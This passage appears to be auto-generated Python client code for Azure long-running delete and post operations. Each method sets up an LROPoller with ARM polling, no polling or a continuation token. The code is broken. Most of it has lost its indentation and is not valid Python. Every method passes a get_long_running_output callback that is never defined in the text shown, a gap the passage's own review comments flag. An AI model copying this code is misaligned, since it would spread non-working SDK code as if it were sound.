raw_result = self._delete_provisioning202_accepted200_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_deleting_failed200(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Failed’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_provisioning202_deleting_failed200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_deletingcanceled200(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Canceled’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_provisioning202_deletingcanceled200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete204_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete succeeds and returns right away.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete204_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_retry200(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request. Polls return this
value until the last poll returns a ‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_retry200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_no_retry204(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request. Polls return this
value until the last poll returns a ‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_no_retry204_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_no_header_in_retry(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a location header in the initial request.
Subsequent calls to operation status do not contain location header.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_no_header_in_retry_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_no_header_in_retry(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns an Azure-AsyncOperation header in the initial
request. Subsequent calls to operation status do not contain Azure-AsyncOperation header.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_no_header_in_retry_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_retry_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_retry_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_no_retry_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_no_retry_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_retry_failed(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_retry_failed_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_retrycanceled(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_retrycanceled_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post200_with_payload(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request, with 'Location'
header. Poll returns a 200 with a response body after success.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional.
"name": "str" # Optional.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post200_with_payload_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
        """Long running post request, service returns a 202 to the initial request, with 'Location' and
        'Retry-After' headers, Polls return a 200 with a response body after success.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns None
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post202_retry200_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post202_no_retry204(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running post request, service returns a 202 to the initial request, with 'Location'
        header, 204 with no response body after success.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }

                # response body for status code(s): 202
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post202_no_retry204_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post_double_headers_final_location_get(self, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running post request, service returns a 202 to the initial request with both Location and
        Azure-Async header. Poll Azure-Async and its success. Should poll Location to get the final
        object.

        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # response body for status code(s): 202
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_double_headers_final_location_get_initial(cls=lambda x, y, z: x, **kwargs)
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # ARM polling is configured to fetch the final resource from the
        # Location header ("final-state-via": "location") for this operation.
        if polling is True:
            polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "location"}, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post_double_headers_final_azure_header_get(self, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running post request, service returns a 202 to the initial request with both Location and
        Azure-Async header. Poll Azure-Async and its success. Should NOT poll Location to get the
        final object.

        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # response body for status code(s): 202
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_double_headers_final_azure_header_get_initial(cls=lambda x, y, z: x, **kwargs)
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # ARM polling is pinned to the Azure-AsyncOperation header for the final
        # state ("final-state-via": "azure-async-operation"); Location is ignored.
        if polling is True:
            polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "azure-async-operation"}, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
